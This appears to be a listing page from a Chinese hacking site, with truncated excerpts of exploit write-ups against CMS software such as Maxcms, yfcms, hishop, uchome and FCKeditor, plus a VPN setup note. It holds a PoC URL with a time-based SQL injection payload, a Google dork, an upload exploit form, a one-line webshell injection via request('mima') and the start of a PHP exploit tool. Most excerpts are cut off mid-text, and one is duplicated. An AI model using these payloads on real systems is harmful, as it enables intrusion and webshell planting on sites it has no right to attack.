马克斯CMS(Maxcms) admin_inc.asp SQL注入漏洞及修复
在文件admin/ admin_inc.asp中: Sub checkPower //第103行 dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db("select m_random,m_level from {pre}manager where...
在文件admin/ admin_inc.asp中: Sub checkPower //第103行 dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db("select m_random,m_level from {pre}manager where...
后台的登录注入点,不过悲剧的是无回显只能盲注。更悲剧的是mysql数据库是5一下的版本! 不过还好站点是asp.net程序的使程序报错后能显示一些信息。 正文开始吧。 目标站点找了一圈没发现入口点,旁站没几个,不过幸运的是发现了个登录框的注入点!(应为这个旁站只有一个登录入口!) 刚开是在用户名那里输入了 admin'-- 报错了 You have an error in your SQL syn...
1: OdiHost Newsletter plugin <= 1.0 POC: https://www.webshell.cc/wp-content/plugins/odihost-newsletter-plugin/includes/openstat.php?uid=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,11...
google关键字:intext:版权所有:yfcms 利用文件:admin\WebEditor\asp\upload.asp 利用代码: <form action="http://www.badguest.cn/admin/WebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=st999...
本人一直都在共享着自己使用的VIP迅雷账号, 但更新过几次都是在几天之后提示密码错误, 用密保把密码改回来发现安全邮箱被改成@QQ.COM的 E-Mail地址了 用IE8.0更改无法查看“老是提示验证码错误”,用Opera浏览器可看到一半(如图) 我自己从来都没用QQ E-mail做为安全邮箱,进迅雷离线发现原来可以在离线功能处可以更改安全邮箱(如图) PS:共享迅雷VIP账号有风...
例如: 网址:https://www.webshell.cc/newslist.asp?id=122′ 提示“你的操作已被记录!”等信息。 利用方法:https://www.webshell.cc/sqlin.asp 看是否存在,存在提交https://www.webshell.cc/newslist.asp?id=122‘excute(request("mima"))写入一句话
描述:fckeditor 详细说明:currentfolder过滤不给力啊,但是GPC就能让它脑残!下面是利用工具! 利用: <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); $match = arr...
hishop 自从09年 5.1 和5.1.3爆过漏洞之后就没爆了。。 前段时间看了下,找到一个注入点,不过语句有点复杂而且还过滤了下划线(表名当中都有下划线),所以需要特别构造下, 这个注入点再结合iis6就能拿shell了。 前几天看到了toby57大牛dz1.5的exp, 看的我荡漾了,所以下午花了点时间,看了下PHP,学着写了个php的exp。 大牛别笑哈。。 选这种类似的URL 拿she...
正所谓常在河边走哪有不湿脚,这几天正在想法搞VPN代理,网上搜索大把的资料来看了,并按照资料的方法自己尝试了下发现那些资料一点都不靠谱。鼓捣了半天我也没搞定VPN的架设,最多的就是架设好后能连接了,但预期的效果却没达到,发现VPN连接后不能上网了。最终还是在朋友的帮助下搞定了 windows2003单网卡环境下的VPN架设,现在就把具体方法发布给大家,希望对大家有所帮助。 要架设个属...
抽uchome两个老的SQL注入漏洞举例,漏洞很久以前就被人公布过了,两个SQL注入都在个人资料更新的流程里: 注册变量的代码KEY的内容直接进入了$inserts数组 foreach ($_POST['friend'] as $key => $value) { $value = intval($value); $inserts[] = "('base','$key','$sp...